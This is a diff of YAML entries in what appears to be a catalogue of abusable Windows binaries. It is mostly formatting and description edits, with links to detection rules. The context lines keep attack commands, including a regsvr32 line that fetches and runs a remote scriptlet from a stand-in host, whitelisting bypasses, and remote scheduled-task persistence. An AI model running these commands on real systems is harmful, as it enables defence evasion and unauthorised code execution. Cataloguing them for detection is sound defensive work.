    Handle: '@pabraeken'
---
--- a/yml/OSBinaries/Pktmon.yml
+++ b/yml/OSBinaries/Pktmon.yml
@ -31,4 +31,3 @@ Resources:
 Acknowledgement:
  - Person: Derek Johnson
    Handle: ''
---
--- a/yml/OSBinaries/Pnputil.yml
+++ b/yml/OSBinaries/Pnputil.yml
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows 10,7
 Full_Path:
  - Path: C:\Windows\system32\pnputil.exe
-Code_Sample: 
+Code_Sample:
  - Code: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/a8a0d546f347febb0423aa920dbc10713cc1f92f/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml
@ -22,4 +22,3 @@ Acknowledgement:
    Handle: '@LuxNoBulIshit'
  - Person: Avihay eldad
    Handle: '@aloneliassaf'
---
--- a/yml/OSBinaries/Presentationhost.yml
+++ b/yml/OSBinaries/Presentationhost.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Print.yml
+++ b/yml/OSBinaries/Print.yml
@ -40,4 +40,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/PrintBrm.yml
+++ b/yml/OSBinaries/PrintBrm.yml
@ -28,4 +28,3 @@ Resources:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
---
--- a/yml/OSBinaries/Psr.yml
+++ b/yml/OSBinaries/Psr.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Leon Rodenko
    Handle: '@L3m0nada'
---
--- a/yml/OSBinaries/Rasautou.yml
+++ b/yml/OSBinaries/Rasautou.yml
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: FireEye
    Handle: '@FireEye'
---
--- a/yml/OSBinaries/Rdrleakdiag.yml
+++ b/yml/OSBinaries/Rdrleakdiag.yml
@ -41,4 +41,3 @@ Resources:
 Acknowledgement:
  - Person: Grzegorz Tworek
    Handle: '@0gtweet'
---
--- a/yml/OSBinaries/Reg.yml
+++ b/yml/OSBinaries/Reg.yml
@ -36,4 +36,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Regasm.yml
+++ b/yml/OSBinaries/Regasm.yml
@ -7,7 +7,7 @@ Commands:
  - Command: regasm.exe AllTheThingsx64.dll
    Description: Loads the target .DLL file and executes the RegisterClass function.
    Usecase: Execute code and bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: Local Admin
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -38,4 +38,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Regedit.yml
+++ b/yml/OSBinaries/Regedit.yml
@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Regini.yml
+++ b/yml/OSBinaries/Regini.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Eli Salem
    Handle: '@elisalem9'
---
--- a/yml/OSBinaries/Register-cimprovider.yml
+++ b/yml/OSBinaries/Register-cimprovider.yml
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: Philip Tsukerman
    Handle: '@PhilipTsukerman'
---
--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
@ -14,7 +14,7 @@ Commands:
  - Command: regsvcs.exe AllTheThingsx64.dll
    Description: Loads the target .DLL file and executes the RegisterClass function.
    Usecase: Execute dll file and bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: Local Admin
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Regsvr32.yml
+++ b/yml/OSBinaries/Regsvr32.yml
@ -7,14 +7,14 @@ Commands:
  - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
    Description: Execute the specified remote .SCT script with scrobj.dll.
    Usecase: Execute code from remote scriptlet, bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
    Description: Execute the specified local .SCT script with scrobj.dll.
    Usecase: Execute code from scriptlet, bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -36,7 +36,7 @@ Full_Path:
  - Path: C:\Windows\System32\regsvr32.exe
  - Path: C:\Windows\SysWOW64\regsvr32.exe
 Code_Sample:
- - Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6fbce11094285e5ba13fe101b9cb70f5b1ece198/rules/windows/process_creation/win_susp_regsvr32_anomalies.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6d56e400d209daa77a7900d950a7c587dc0cd2e5/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml
@ -57,4 +57,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Replace.yml
+++ b/yml/OSBinaries/Replace.yml
@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: elceef
    Handle: '@elceef'
---
--- a/yml/OSBinaries/Rpcping.yml
+++ b/yml/OSBinaries/Rpcping.yml
@ -39,4 +39,3 @@ Acknowledgement:
    Handle: '@splinter_code'
  - Person: ap
    Handle: '@decoder_it'
---
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@ -91,4 +91,3 @@ Acknowledgement:
    Handle: '@404death'
  - Person: Martin Ingesen
    Handle: '@Mrtn9'
---
--- a/yml/OSBinaries/Runonce.yml
+++ b/yml/OSBinaries/Runonce.yml
@ -1,6 +1,6 @@
 ---
 Name: Runonce.exe
-Description:
+Description: Executes a Run Once Task that has been configured in the registry
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -27,4 +27,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
---
--- a/yml/OSBinaries/Runscripthelper.yml
+++ b/yml/OSBinaries/Runscripthelper.yml
@ -1,6 +1,6 @@
 ---
 Name: Runscripthelper.exe
-Description:
+Description: Execute target PowerShell script
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -18,7 +18,7 @@ Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_runscripthelper.yml
-  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules 
+  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - IOC: Event 4014 - Powershell logging
  - IOC: Event 400
 Resources:
@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
  - Person: Matt Graeber
    Handle: '@mattifestation'
---
--- a/yml/OSBinaries/Sc.yml
+++ b/yml/OSBinaries/Sc.yml
@ -36,4 +36,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Schtasks.yml
+++ b/yml/OSBinaries/Schtasks.yml
@ -11,7 +11,7 @@ Commands:
    Privileges: User
    MitreID: T1053.005
    OperatingSystem: Windows
-  - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily 
+  - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
    Description: Create a scheduled task on a remote computer for persistence/lateral movement
    Usecase: Create a remote task to run daily relative to the the time of creation
    Category: Execute
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person:
    Handle:
---
--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@ -1,6 +1,6 @@
 ---
 Name: Scriptrunner.exe
-Description:
+Description: Execute binary through proxy binary to evade defensive counter measures
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person: Nick Tyrer
    Handle: '@nicktyrer'
---
--- a/yml/OSBinaries/SettingSyncHost.yml
+++ b/yml/OSBinaries/SettingSyncHost.yml
@ -31,4 +31,3 @@ Acknowledgement:
    Handle: '@hexacorn'
  - Person: Elliot Killick
    Handle: '@elliotkillick'
---
--- a/yml/OSBinaries/Stordiag.yml
+++ b/yml/OSBinaries/Stordiag.yml
@ -22,4 +22,3 @@ Resources:
 Acknowledgement:
  - Person: Eral4m
    Handle: '@eral4m'
---
--- a/yml/OSBinaries/Syncappvpublishingserver.yml
+++ b/yml/OSBinaries/Syncappvpublishingserver.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Nick Landers
    Handle: '@monoxgas'
---
--- a/yml/OSBinaries/Ttdinject.yml
+++ b/yml/OSBinaries/Ttdinject.yml
@ -35,4 +35,3 @@ Acknowledgement:
    Handle: '@oddvarmoe'
  - Person: Maxime Nadeau
    Handle: '@m_nad0'
---
--- a/yml/OSBinaries/Tttracer.yml
+++ b/yml/OSBinaries/Tttracer.yml
@ -37,4 +37,3 @@ Acknowledgement:
    Handle: '@oulusoyum'
  - Person: Matt Graeber
    Handle: '@mattifestation'
---
--- a/yml/OSBinaries/Vbc.yml
+++ b/yml/OSBinaries/Vbc.yml
@ -22,13 +22,12 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
 Code_Sample:
-   - Code:
+  - Code:
 Detection:
-   - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml
-   - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
 Acknowledgement:
  - Person: Lior Adar
    Handle:
  - Person: Hai Vaknin(Lux)
    Handle:
---
--- a/Show More
+++ b/Show More